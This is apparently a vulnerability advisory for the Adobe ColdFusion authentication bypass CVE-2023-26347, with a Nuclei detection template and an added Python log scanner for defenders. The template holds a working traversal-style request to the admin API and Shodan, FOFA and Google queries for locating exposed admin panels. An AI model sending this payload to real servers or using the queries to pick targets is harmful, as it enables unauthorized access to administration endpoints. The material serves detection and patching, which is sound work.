Adobe Coldfusion - Authentication Bypass

Published: 2023-11-23 11:53:05
Source: ProjectDiscovery (github.com)
Tags: cve2023, adobe, coldfusion, authentication, bypass, vulnerability, unauthenticated, administration

CVSS3 score: 7.5 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: NONE
Availability Impact: NONE
Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score: 7.5 High (confidence: High)
EPSS: 0.003 Low (percentile: 70.5%)

Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An unauthenticated attacker could leverage this vulnerability to access the administration CFM and CFC endpoints. Exploitation of this issue does not require user interaction.

Nuclei template:

id: CVE-2023-26347

info:
  name: Adobe Coldfusion - Authentication Bypass
  author: salts
  severity: high
  description: |
    Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An unauthenticated attacker could leverage this vulnerability to access the administration CFM and CFC endpoints. Exploitation of this issue does not require user interaction.
  remediation: |
    Update to the latest version of Adobe Coldfusion
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-26347
    - https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-26347
    cwe-id: CWE-284
    epss-score: 0.00415
    epss-percentile: 0.73972
    cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: adobe
    product: coldfusion
    shodan-query:
      - http.component:"Adobe ColdFusion"
      - http.component:"adobe coldfusion"
      - http.title:"coldfusion administrator login"
      - cpe:"cpe:2.3:a:adobe:coldfusion"
    fofa-query:
      - app="Adobe-ColdFusion"
      - app="adobe-coldfusion"
      - title="coldfusion administrator login"
    google-query: intitle:"coldfusion administrator login"
  tags: cve2023,cve,adobe,coldfusion,auth-bypass

http:
  - raw:
      - |
        GET /hax/..CFIDE/adminapi/administrator.cfc?method=getBuildNumber&_cfclient=true HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'wddxPacket version='
          - '<string>'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450220369c99422e48defa25ecfd647f147650291c7119a47e0dc1e6ac7c604b326479022100aaaa20e9ba989242707c217de18b6debae9bb920d91261d03bf56e876020091e:922c64590222798bb761d5b6d8e72950
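The template above checks a host by sending the `..CFIDE/adminapi` request and matching the WDDX response. The following is an added defender-side example, not part of the ProjectDiscovery template: it scans web-server access-log lines (Common Log Format) for requests with the same shape, so that attempts against the admin endpoints can be spotted in existing logs. The log lines and regexes are constructed for this example.

```python
import re

# Added example (not from the Nuclei template): flag access-log entries whose
# request path reaches the CFIDE admin endpoints through a ".." segment that is
# not a normal "../" traversal, e.g. "/hax/..CFIDE/adminapi/administrator.cfc".

# Common Log Format: client ident user [timestamp] "METHOD PATH PROTO" status bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

# ".." immediately followed by a non-slash run that ends in "CFIDE/", then an
# administrative endpoint. Case-insensitive, since the paths are often served
# from case-insensitive filesystems.
BYPASS_RE = re.compile(r'\.\.[^/]*CFIDE/(adminapi|administrator)/', re.IGNORECASE)

def classify(line):
    """Return a finding dict for a suspicious log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, method, path, status = m.groups()
    if not BYPASS_RE.search(path):
        return None
    return {
        "client": client,
        "method": method,
        "path": path,
        "status": int(status),
        # A 200 on the admin endpoint suggests the request was served;
        # any other status is still an attempt worth recording.
        "likely_success": status == "200",
        # The template's request carries this parameter; note it as a signal.
        "cfclient": "_cfclient=true" in path.lower(),
    }

def scan(lines):
    """Run classify() over an iterable of log lines and keep the findings."""
    return [f for f in (classify(l) for l in lines) if f]

# Constructed sample log lines (not real traffic).
SAMPLE = [
    '203.0.113.5 - - [23/Nov/2023:11:53:05 +0000] "GET /hax/..CFIDE/adminapi/administrator.cfc?method=getBuildNumber&_cfclient=true HTTP/1.1" 200 412',
    '203.0.113.5 - - [23/Nov/2023:11:53:06 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 302 0',
    '198.51.100.7 - - [23/Nov/2023:11:54:00 +0000] "GET /index.cfm HTTP/1.1" 200 1024',
    '198.51.100.9 - - [23/Nov/2023:11:55:00 +0000] "GET /a/..CFIDE/administrator/index.cfm HTTP/1.1" 403 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A plain request to /CFIDE/administrator/ without the dot-dot segment is deliberately not flagged, since legitimate administrators use that path; only the traversal-shaped form is reported.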
